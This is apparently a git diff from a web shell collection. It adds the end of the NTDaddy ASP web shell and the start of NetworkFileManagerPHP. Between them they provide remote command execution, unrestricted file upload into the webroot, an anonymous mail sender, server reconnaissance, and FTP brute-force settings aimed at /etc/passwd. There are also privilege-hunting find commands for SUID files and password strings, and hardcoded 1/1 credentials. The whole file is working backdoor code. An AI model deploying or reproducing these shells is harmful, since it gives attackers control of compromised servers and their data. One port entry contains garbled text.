+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in fc
+if showfileinfo="TRUE" then
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr>")
+response.write("<td align=center nowrap><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+select case f1.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FileAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "</td></tr>")
+end if
+else
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr><td><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td></tr>")
+end if
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+%>
+<STYLE>
+BODY
+{scrollbar-face-color: #f8f8ff; scrollbar-shadow-color: #cccccc;
+scrollbar-highlight-color: #cccccc; scrollbar-3dlight-color: #cccccc;
+scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000;
+scrollbar-arrow-color: #000000}
+</STYLE>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<center>
+<font size="18" color="#ffffff">NTDaddy | fux0r inc.</font>
+<hr color="#ffffff">
+<table border=1 width="100%" color="#fffff">
+<tr>
+<td align=center width=100% bgcolor=#ffffff><font color=#000000><a name=lblCurrentPath value=
+<% 
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+end if
+response.write(chr(34) & IP & chr(34) & ">" & FP)
+%>
+</a></td>
+</tr>
+</table>
+<table border=0 cellspacing=1 bordercolor="#ffffff" width=100% height=100%>
+<tr colspan=3><td align=left colspan=3><% =ShowDriveLetters() %></td>
+<td align=center></td></tr>
+<tr valign=top width=100%><td align=left><% =ShowFolderNames() %></td>
+<td align=right><% =ShowFileNames() %></td>
+</tr>
+</table>
+<br><hr color="#ffffff"><br>
+<table cellpadding="3" cellspacing="3" border="5" bordercolor="#ffffff">
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>• Remote Info.</b></font>
+</td>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>• Local Info.</b></font>
+</td>
+</tr>
+<tr>
+<td align=left>
+<div align=left><font size="3">
+<b>User</b>: <%= "\\" & oScriptNet.ComputerName & " \ " & oScriptNet.UserName %> <br>
+<b>ID</b>: <%=request.servervariables("SERVER_NAME")%> <br>
+<b>IP</b>: <%=request.servervariables("LOCAL_ADDR")%> <br>
+<b>HTTPD</b>: <%=request.servervariables("SERVER_SOFTWARE")%> <b>Port</b>: <%=request.servervariables("SERVER_PORT")%> <br>
+<b>Webroot</b>: <%=request.servervariables("APPL_PHYSICAL_PATH")%> <br>
+<b>LogRoot</b>: <%=request.servervariables("APPL_MD_PATH")%> <br>
+<b>Date</b>: <% =date() %> <br>
+<b>Time</b>: <%=time() %> <br>
+<b>HTTPs</b>: <%=request.servervariables("HTTPS")%>
+<br></font></div>
+</td>
+<td align="left" valign="top">
+<b>Local Addr (What they see.)</b>: <%=request.servervariables("REMOTE_ADDR")%> <br>
+<b>Forwarded from</b> : <%=request.servervariables("HTTP_X_FORWARDED_FOR")%> <br>
+<b>Via</b>: <%=request.servervariables("HTTP_VIA")%> <br>
+<b>User Agent</b>: <%=request.servervariables("HTTP_USER_AGENT")%> <br>
+<b>Wookie</b>: <%=request.servervariables("HTTP_WOOKIE")%> <br>
+<b>Cache Control</b>: <%=request.servervariables("HTTP_CACHE_CONTROL")%> <br>
+<b>Interface</b>: <%=request.servervariables("GATEWAY_INTERFACE")%> <br>
+<b>Protocol</b>: <%=request.servervariables("SERVER_PROTOCOL")%> <br>
+<b>Method</b>: <%=request.servervariables("REQUEST_METHOD")%>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<table cellpadding="3" cellspacing"1" bordercolor="#F8F8FF" border=5>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>• File Upload Utility</b></font></td>
+</tr>
+<tr>
+<td align="left">
+<form method=post ENCTYPE="multipart/form-data">
+<b>File</b> : <input type="file" size="35" name="File1"><br>
+<input type="submit" Name="Action" value="Upload the file">
+</form></td>
+</tr>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>• RAW D.O.S. COMMAND INTERFACE</b></font></td>
+</tr>
+<tr valign="top">
+<td align="left">
+<form action="<%= Request.ServerVariables("URL") %>" method="POST">
+<p><input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="submit" value="Run"> </p>
+</form>
+<pre>
+<%
+If (IsObject(oFile)) Then
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If%>
+</pre>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<form action=ntdaddy.asp method=post>
+<form action=ntdaddy.asp method=post>
+<table border=3 cellpadding="3" cellspacing="2" bordercolor="#ffffff" width="400">
+<tr>
+<td bgcolor="#F8F8FF" colspan="2"><font color="#000000" align="left"><b>• Anonymous Email Utility</b></font></td>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>From:</b></font> </td>
+<td><input name=From size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>To:</b></font> </td>
+<td><input name=To size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>Subject:</b></font> </td>
+<td><input name=Subject size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td valign="top" bgcolor="#F8F8FF"><font color="#000000"><b>Body:</b></font> </td>
+<td><textarea cols=30 name=Body rows=5 style="HEIGHT: 86px; WIDTH: 322px" wrap=virtual></textarea></td>
+</tr>
+<tr>
+<td align="right" bgcolor="#F8F8FF" colspan="2">
+<input type="submit" value="Send Mail">
+<input type="hidden" name="flag" value="1"></td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<font size="#ffffff"><center>•[ <b>NTDaddy v1.9</b> ][ by obzerve ][ for the brothers of <b>fux0r inc.</b> 2k+1 ]•</b></center></font>
+</body>
+</html>
+<SCRIPT RUNAT=SERVER LANGUAGE=VBSCRIPT>
+Const IncludeType = 2 
+Dim UploadSizeLimit
+Function GetUpload()
+Dim Result
+Set Result = Nothing
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Dim CT, PosB, Boundary, Length, PosE
+CT = Request.ServerVariables("HTTP_Content_Type") 
+If LCase(Left(CT, 19)) = "multipart/form-data" Then 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 Then Boundary = Mid(CT, PosB + 9) 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 then 
+PosB = InStr(Boundary, ",")
+If PosB > 0 Then Boundary = Left(Boundary, PosB - 1)
+end if
+Length = CLng(Request.ServerVariables("HTTP_Content_Length")) 
+If "" & UploadSizeLimit <> "" Then
+UploadSizeLimit = CLng(UploadSizeLimit)
+If Length > UploadSizeLimit Then
+Request.BinaryRead (Length)
+Err.Raise 2, "GetUpload", "Upload size " & FormatNumber(Length, 0) & "B exceeds limit of " & FormatNumber(UploadSizeLimit, 0) & "B"
+Exit Function
+End If
+End If
+If Length > 0 And Boundary <> "" Then 
+Boundary = "--" & Boundary
+Dim Head, Binary
+Binary = Request.BinaryRead(Length) 
+Set Result = SeparateFields(Binary, Boundary)
+Binary = Empty 
+Else
+Err.Raise 10, "GetUpload", "Zero length request ."
+End If
+Else
+Err.Raise 11, "GetUpload", "No file sent."
+End If
+Else
+Err.Raise 1, "GetUpload", "Bad request method."
+End If
+Set GetUpload = Result
+End Function
+Function SeparateFields(Binary, Boundary)
+Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary
+Dim Fields
+Boundary = StringToBinary(Boundary)
+PosOpenBoundary = InStrB(Binary, Boundary)
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0)
+Set Fields = CreateObject("Scripting.Dictionary")
+Do While (PosOpenBoundary > 0 And PosCloseBoundary > 0 And Not isLastBoundary)
+Dim HeaderContent, FieldContent, bFieldContent
+Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Dim Field, TwoCharsAfterEndBoundary
+PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf))
+HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2)
+bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2)
+GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Set Field = CreateUploadField() 
+Set FieldContent = CreateBinaryData()
+FieldContent.ByteArray = bFieldContent
+FieldContent.Length = LenB(bFieldContent)
+Field.Name = FormFieldName
+Field.ContentDisposition = Content_Disposition
+Field.FilePath = SourceFileName
+Field.FileName = GetFileName(SourceFileName)
+Field.ContentType = Content_Type
+Field.Length = FieldContent.Length
+Set Field.Value = FieldContent
+Fields.Add FormFieldName, Field
+TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2))
+isLastBoundary = TwoCharsAfterEndBoundary = "--"
+If Not isLastBoundary Then 
+PosOpenBoundary = PosCloseBoundary
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary)
+End If
+Loop
+Set SeparateFields = Fields
+End Function
+Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type)
+Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";"))
+Name = (SeparateField(Head, "name=", ";")) 
+If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2)
+FileName = (SeparateField(Head, "filename=", ";")) 
+If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2)
+Content_Type = LTrim(SeparateField(Head, "content-type:", ";"))
+End Function
+Function SeparateField(From, ByVal sStart, ByVal sEnd)
+Dim PosB, PosE, sFrom
+sFrom = LCase(From)
+PosB = InStr(sFrom, sStart)
+If PosB > 0 Then
+PosB = PosB + Len(sStart)
+PosE = InStr(PosB, sFrom, sEnd)
+If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf)
+If PosE = 0 Then PosE = Len(sFrom) + 1
+SeparateField = Mid(From, PosB, PosE - PosB)
+Else
+SeparateField = Empty
+End If
+End Function
+Function GetFileName(FullPath)
+Dim Pos, PosF
+PosF = 0
+For Pos = Len(FullPath) To 1 Step -1
+Select Case Mid(FullPath, Pos, 1)
+Case "/", "\": PosF = Pos + 1: Pos = 0
+End Select
+Next
+If PosF = 0 Then PosF = 1
+GetFileName = Mid(FullPath, PosF)
+End Function
+Function BinaryToString(Binary)
+dim cl1, cl2, cl3, pl1, pl2, pl3
+Dim L
+cl1 = 1
+cl2 = 1
+cl3 = 1
+L = LenB(Binary)
+Do While cl1<=L
+pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
+cl1 = cl1 + 1
+cl3 = cl3 + 1
+if cl3>300 then
+pl2 = pl2 & pl3
+pl3 = ""
+cl3 = 1
+cl2 = cl2 + 1
+if cl2>200 then
+pl1 = pl1 & pl2
+pl2 = ""
+cl2 = 1
+End If
+End If
+Loop
+BinaryToString = pl1 & pl2 & pl3
+End Function
+Function BinaryToStringold(Binary)
+Dim I, S
+For I = 1 To LenB(Binary)
+S = S & Chr(AscB(MidB(Binary, I, 1)))
+Next
+BinaryToString = S
+End Function
+Function StringToBinary(String)
+Dim I, B
+For I=1 to len(String)
+B = B & ChrB(Asc(Mid(String,I,1)))
+Next
+StringToBinary = B
+End Function
+Function vbsSaveAs(FileName, ByteArray)
+Dim FS, TextStream
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set TextStream = FS.CreateTextFile(FileName)
+TextStream.Write BinaryToString(ByteArray) 
+TextStream.Close
+End Function
+</SCRIPT>
+<SCRIPT RUNAT=SERVER LANGUAGE=JSCRIPT>
+function CreateUploadField(){ return new uf_Init() }
+function uf_Init(){
+this.Name = null
+this.ContentDisposition = null
+this.FileName = null
+this.FilePath = null
+this.ContentType = null
+this.Value = null
+this.Length = null
+}
+function CreateBinaryData(){ return new bin_Init() }
+function bin_Init(){
+this.ByteArray = null
+this.Length = null
+this.String = jsBinaryToString
+this.SaveAs = jsSaveAs
+}
+function jsBinaryToString(){
+return BinaryToString(this.ByteArray)
+}
+function jsSaveAs(FileName){
+return vbsSaveAs(FileName, this.ByteArray)
+}
+</SCRIPT>
+<%
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Set Fields = GetUpload()
+FilePath = Server.MapPath(".") & "\" & Fields("File1").FileName
+Fields("File1").Value.SaveAs FilePath
+End If
+%>
+<%
+Else
+Dim anonFrom,anonTo,anonSubj,anonBody
+anonFrom = request.form("From")
+anonTo = request.form("To")
+anonSubj = request.form("Subject")
+anonBody = request.form("Body")
+Set objMail = CreateObject("CDONTS.NewMail")
+objMail.From=anonFrom
+objMail.To=anonTo
+objMail.Subject=anonSubj
+objMail.Body=anonBody
+intReturn=objMail.Send()
+%>
+<html>
+<head><title>|[NTDaddy v1.9 | anon email]</title></head>
+<h1>Message sent successfully!</h1><br><br><br>
+<table border=0 cellpadding="0" cellspacing="3">
+<tr>
+<td>
+<input type='button' value='Back' onclick=history.back()> </td>
+<td>
+<h2>[NTDaddy v1.9 - obzerve | fux0r inc.]</h2> </td>
+</tr>
+</table>
+</html>
+<%
+End if
+%>
+
+
+
diff --git a/138shell/N/NetworkFileManagerPHP.txt b/138shell/N/NetworkFileManagerPHP.txt
new file mode 100644
index 0000000..a0cf326
--- /dev/null
+++ b/138shell/N/NetworkFileManagerPHP.txt
@@ -0,0 +1,5603 @@
+<?
+
+if (ini_get('register_globals') != '1') {
+
+   if (!empty($HTTP_POST_VARS))
+
+    extract($HTTP_POST_VARS);
+
+
+
+  if (!empty($HTTP_GET_VARS))
+
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+
+    extract($HTTP_SERVER_VARS);
+
+}
+
+
+
+$use_md5=0; // Define use of MD5 crypt algoritm //
+
+$uname="1";
+
+$upass="1";
+
+
+
+
+
+
+if ($action != "download" && $action != "view" ):
+
+?>
+
+
+
+<?
+
+
+
+/* Define your email for file send function*/
+
+$demail ="effes2004@gmail.com";
+
+
+
+/* config here */
+
+$title="NetworkFileManagerPHP for channel #hack.ru";
+
+$ver="1.7.private ([final_english_release])";
+
+$sob="Belongs to <b><u>revers</u></b>";
+
+$id="1337";
+
+
+
+/* FTP-bruteforce */
+
+$filename="/etc/passwd";
+
+$ftp_server="localhost";
+
+/* port scanner */
+
+$min="1";
+
+$max="65535";
+
+
+
+/* Aliases */
+
+$aliases=array(
+
+/* find all SUID files */
+
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+
+/* find all SGID files */
+
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+
+/* find all config.inc.php files */
+
+'find / -type f -name config.inc.php' => 'find all config.inc.php files',
+
+/* find accesseable writeable directories and files*/
+
+'find / -perm -2 -ls' => 'find writeable directories and files',
+
+'ls -la' => 'Current directory listing with rights access',
+
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
+
+
+
+);
+
+
+
+/* ports and services names */
+
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+
+$port[2] = "Management Utility";
+
+$port[3] = "Compression Process";
+
+$port[5] = "rje (Remote Job Entry)";
+
+$port[7] = "echo";
+
+$port[9] = "discard";
+
+$port[11] = "systat";
+
+$port[13] = "daytime";
+
+$port[15] = "netstat";
+
+$port[17] = "quote of the day";
+
+$port[18] = "send/rwp";
+
+$port[19] = "character generator";
+
+$port[20] = "ftp-data";
+
+$port[21] = "ftp";
+
+$port[22] = "ssh, pcAnywhere";
+
+$port[23] = "Telnet";
+
+$port[25] = "SMTP (Simple Mail Transfer)";
+
+$port[27] = "ETRN (NSW User System FE)";
+
+$port[29] = "MSG ICP";
+
+$port[31] = "MSG Authentication";
+
+$port[33] = "dsp (Display Support Protocol)";
+
+$port[37] = "time";
+
+$port[38] = "RAP (Route Access Protocol)";
+
+$port[39] = "rlp (Resource Location Protocol)";
+
+$port[41] = "Graphics";
+
+$port[42] = "nameserv, WINS";
+
+$port[43] = "whois, nickname";
+
+$port[44] = "MPM FLAGS Protocol";
+
+$port[45] = "Message Processing Module [recv]";
+
+$port[46] = "MPM [default send]";
+
+$port[47] = "NI FTP";
+
+$port[48] = "Digital Audit Daemon";
+
+$port[49] = "TACACS, Login Host Protocol";
+
+$port[50] = "RMCP, re-mail-ck";
+
+$port[53] = "DNS";
+
+$port[57] = "MTP (any private terminal access)";
+
+$port[59] = "NFILE";
+
+$port[60] = "Unassigned";
+
+$port[61] = "NI MAIL";
+
+$port[62] = "ACA Services";
+
+$port[63] = "whois++";
+
+$port[64] = "Communications Integrator (CI)";
+
+$port[65] = "TACACS-Database Service";
+
+$port[66] = "Oracle SQL*NET";
+
+$port[67] = "bootps (Bootstrap Protocol Server)";
+
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+
+$port[70] = "Gopher";
+
+$port[71] = "Remote Job Service";
+
+$port[72] = "Remote Job Service";
+
+$port[73] = "Remote Job Service";
+
+$port[74] = "Remote Job Service";
+
+$port[75] = "any private dial out service";
+
+$port[76] = "Distributed External Object Store";
+
+$port[77] = "any private RJE service";
+
+$port[78] = "vettcp";
+
+$port[79] = "finger";
+
+$port[80] = "World Wide Web HTTP";
+
+$port[81] = "HOSTS2 Name Serve";
+
+$port[82] = "XFER Utility";
+
+$port[83] = "MIT ML Device";
+
+$port[84] = "Common Trace Facility";
+
+$port[85] = "MIT ML Device";
+
+$port[86] = "Micro Focus Cobol";
+
+$port[87] = "any private terminal link";
+
+$port[88] = "Kerberos, WWW";
+
+$port[89] = "SU/MIT Telnet Gateway";
+
+$port[90] = "DNSIX Securit Attribute Token Map";
+
+$port[91] = "MIT Dover Spooler";
+
+$port[92] = "Network Printing Protocol";
+
+$port[93] = "Device Control Protocol";
+
+$port[94] = "Tivoli Object Dispatcher";
+
+$port[95] = "supdup";
+
+$port[96] = "DIXIE";
+
+$port[98] = "linuxconf";
+
+$port[99] = "Metagram Relay";
+
+$port[100] = "[unauthorized use]";
+
+$port[101] = "HOSTNAME";
+
+$port[102] = "ISO, X.400, ITOT";
+
+$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et";
+
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+
+$port[105] = "CCSO name server protocol";
+
+$port[106] = "poppassd";
+
+$port[107] = "Remote Telnet Service";
+
+$port[108] = "SNA Gateway Access Server";
+
+$port[109] = "POP2";
+
+$port[110] = "POP3";
+
+$port[111] = "Sun RPC Portmapper";
+
+$port[112] = "McIDAS Data Transmission Protocol";
+
+$port[113] = "Authentication Service";
+
+$port[115] = "sftp (Simple File Transfer Protocol)";
+
+$port[116] = "ANSA REX Notify";
+
+$port[117] = "UUCP Path Service";
+
+$port[118] = "SQL Services";
+
+$port[119] = "NNTP";
+
+$port[120] = "CFDP";
+
+$port[123] = "NTP";
+
+$port[124] = "SecureID";
+
+$port[129] = "PWDGEN";
+
+$port[133] = "statsrv";
+
+$port[135] = "loc-srv/epmap";
+
+$port[137] = "netbios-ns";
+
+$port[138] = "netbios-dgm (UDP)";
+
+$port[139] = "NetBIOS";
+
+$port[143] = "IMAP";
+
+$port[144] = "NewS";
+
+$port[150] = "SQL-NET";
+
+$port[152] = "BFTP";
+
+$port[153] = "SGMP";
+
+$port[156] = "SQL Service";
+
+$port[161] = "SNMP";
+
+$port[175] = "vmnet";
+
+$port[177] = "XDMCP";
+
+$port[178] = "NextStep Window Server";
+
+$port[179] = "BGP";
+
+$port[180] = "SLmail admin";
+
+$port[199] = "smux";
+
+$port[210] = "Z39.50";
+
+$port[213] = "IPX";
+
+$port[218] = "MPP";
+
+$port[220] = "IMAP3";
+
+$port[256] = "RAP";
+
+$port[257] = "Secure Electronic Transaction";
+
+$port[258] = "Yak Winsock Personal Chat";
+
+$port[259] = "ESRO";
+
+$port[264] = "FW1_topo";
+
+$port[311] = "Apple WebAdmin";
+
+$port[350] = "MATIP type A";
+
+$port[351] = "MATIP type B";
+
+$port[363] = "RSVP tunnel";
+
+$port[366] = "ODMR (On-Demand Mail Relay)";
+
+$port[371] = "Clearcase";
+
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+
+$port[389] = "LDAP";
+
+$port[407] = "Timbuktu";
+
+$port[427] = "Server Location";
+
+$port[434] = "Mobile IP";
+
+$port[443] = "ssl";
+
+$port[444] = "snpp, Simple Network Paging Protocol";
+
+$port[445] = "SMB";
+
+$port[458] = "QuickTime TV/Conferencing";
+
+$port[468] = "Photuris";
+
+$port[475] = "tcpnethaspsrv";
+
+$port[500] = "ISAKMP, pluto";
+
+$port[511] = "mynet-as";
+
+$port[512] = "biff, rexec";
+
+$port[513] = "who, rlogin";
+
+$port[514] = "syslog, rsh";
+
+$port[515] = "lp, lpr, line printer";
+
+$port[517] = "talk";
+
+$port[520] = "RIP (Routing Information Protocol)";
+
+$port[521] = "RIPng";
+
+$port[522] = "ULS";
+
+$port[531] = "IRC";
+
+$port[543] = "KLogin, AppleShare over IP";
+
+$port[545] = "QuickTime";
+
+$port[548] = "AFP";
+
+$port[554] = "Real Time Streaming Protocol";
+
+$port[555] = "phAse Zero";
+
+$port[563] = "NNTP over SSL";
+
+$port[575] = "VEMMI";
+
+$port[581] = "Bundle Discovery Protocol";
+
+$port[593] = "MS-RPC";
+
+$port[608] = "SIFT/UFT";
+
+$port[626] = "Apple ASIA";
+
+$port[631] = "IPP (Internet Printing Protocol)";
+
+$port[635] = "RLZ DBase";
+
+$port[636] = "sldap";
+
+$port[642] = "EMSD";
+
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+
+$port[655] = "tinc";
+
+$port[660] = "Apple MacOS Server Admin";
+
+$port[666] = "Doom";
+
+$port[674] = "ACAP";
+
+$port[687] = "AppleShare IP Registry";
+
+$port[700] = "buddyphone";
+
+$port[705] = "AgentX for SNMP";
+
+$port[901] = "swat, realsecure";
+
+$port[993] = "s-imap";
+
+$port[995] = "s-pop";
+
+$port[1024] = "Reserved";
+
+$port[1025] = "network blackjack";
+
+$port[1062] = "Veracity";
+
+$port[1080] = "SOCKS";
+
+$port[1085] = "WebObjects";
+
+$port[1227] = "DNS2Go";
+
+$port[1243] = "SubSeven";
+
+$port[1338] = "Millennium Worm";
+
+$port[1352] = "Lotus Notes";
+
+$port[1381] = "Apple Network License Manager";
+
+$port[1417] = "Timbuktu Service 1 Port";
+
+$port[1418] = "Timbuktu Service 2 Port";
+
+$port[1419] = "Timbuktu Service 3 Port";
+
+$port[1420] = "Timbuktu Service 4 Port";
+
+$port[1433] = "Microsoft SQL Server";
+
+$port[1434] = "Microsoft SQL Monitor";
+
+$port[1477] = "ms-sna-server";
+
+$port[1478] = "ms-sna-base";
+
+$port[1490] = "insitu-conf";
+
+$port[1494] = "Citrix ICA Protocol";
+
+$port[1498] = "Watcom-SQL";
+
+$port[1500] = "VLSI License Manager";
+
+$port[1503] = "T.120";
+
+$port[1521] = "Oracle SQL";
+
+$port[1522] = "Ricardo North America License Manager";
+
+$port[1524] = "ingres";
+
+$port[1525] = "prospero";
+
+$port[1526] = "prospero";
+
+$port[1527] = "tlisrv";
+
+$port[1529] = "oracle";
+
+$port[1547] = "laplink";
+
+$port[1604] = "Citrix ICA, MS Terminal Server";
+
+$port[1645] = "RADIUS Authentication";
+
+$port[1646] = "RADIUS Accounting";
+
+$port[1680] = "Carbon Copy";
+
+$port[1701] = "L2TP/LSF";
+
+$port[1717] = "Convoy";
+
+$port[1720] = "H.323/Q.931";
+
+$port[1723] = "PPTP control port";
+
+$port[1731] = "MSICCP";
+
+$port[1755] = "Windows Media .asf";
+
+$port[1758] = "TFTP multicast";
+
+$port[1761] = "cft-0";
+
+$port[1762] = "cft-1";
+
+$port[1763] = "cft-2";
+
+$port[1764] = "cft-3";
+
+$port[1765] = "cft-4";
+
+$port[1766] = "cft-5";
+
+$port[1767] = "cft-6";
+
+$port[1808] = "Oracle-VP2";
+
+$port[1812] = "RADIUS server";
+
+$port[1813] = "RADIUS accounting";
+
+$port[1818] = "ETFTP";
+
+$port[1973] = "DLSw DCAP/DRAP";
+
+$port[1985] = "HSRP";
+
+$port[1999] = "Cisco AUTH";
+
+$port[2001] = "glimpse";
+
+$port[2049] = "NFS";
+
+$port[2064] = "distributed.net";
+
+$port[2065] = "DLSw";
+
+$port[2066] = "DLSw";
+
+$port[2106] = "MZAP";
+
+$port[2140] = "DeepThroat";
+
+$port[2301] = "Compaq Insight Management Web Agents";
+
+$port[2327] = "Netscape Conference";
+
+$port[2336] = "Apple UG Control";
+
+$port[2427] = "MGCP gateway";
+
+$port[2504] = "WLBS";
+
+$port[2535] = "MADCAP";
+
+$port[2543] = "sip";
+
+$port[2592] = "netrek";
+
+$port[2727] = "MGCP call agent";
+
+$port[2628] = "DICT";
+
+$port[2998] = "ISS Real Secure Console Service Port";
+
+$port[3000] = "Firstclass";
+
+$port[3001] = "Redwood Broker";
+
+$port[3031] = "Apple AgentVU";
+
+$port[3128] = "squid";
+
+$port[3130] = "ICP";
+
+$port[3150] = "DeepThroat";
+
+$port[3264] = "ccmail";
+
+$port[3283] = "Apple NetAssitant";
+
+$port[3288] = "COPS";
+
+$port[3305] = "ODETTE";
+
+$port[3306] = "mySQL";
+
+$port[3389] = "RDP Protocol (Terminal Server)";
+
+$port[3521] = "netrek";
+
+$port[4000] = "icq, command-n-conquer and shell nfm";
+
+$port[4321] = "rwhois";
+
+$port[4333] = "mSQL";
+
+$port[4444] = "KRB524";
+
+$port[4827] = "HTCP";
+
+$port[5002] = "radio free ethernet";
+
+$port[5004] = "RTP";
+
+$port[5005] = "RTP";
+
+$port[5010] = "Yahoo! Messenger";
+
+$port[5050] = "multimedia conference control tool";
+
+$port[5060] = "SIP";
+
+$port[5150] = "Ascend Tunnel Management Protocol";
+
+$port[5190] = "AIM";
+
+$port[5500] = "securid";
+
+$port[5501] = "securidprop";
+
+$port[5423] = "Apple VirtualUser";
+
+$port[5555] = "Personal Agent";
+
+$port[5631] = "PCAnywhere data";
+
+$port[5632] = "PCAnywhere";
+
+$port[5678] = "Remote Replication Agent Connection";
+
+$port[5800] = "VNC";
+
+$port[5801] = "VNC";
+
+$port[5900] = "VNC";
+
+$port[5901] = "VNC";
+
+$port[6000] = "X Windows";
+
+$port[6112] = "BattleNet";
+
+$port[6502] = "Netscape Conference";
+
+$port[6667] = "IRC";
+
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+
+$port[6699] = "napster";
+
+$port[6776] = "Sub7";
+
+$port[6970] = "RTP";
+
+$port[7007] = "MSBD, Windows Media encoder";
+
+$port[7070] = "RealServer/QuickTime";
+
+$port[7777] = "cbt";
+
+$port[7778] = "Unreal";
+
+$port[7648] = "CU-SeeMe";
+
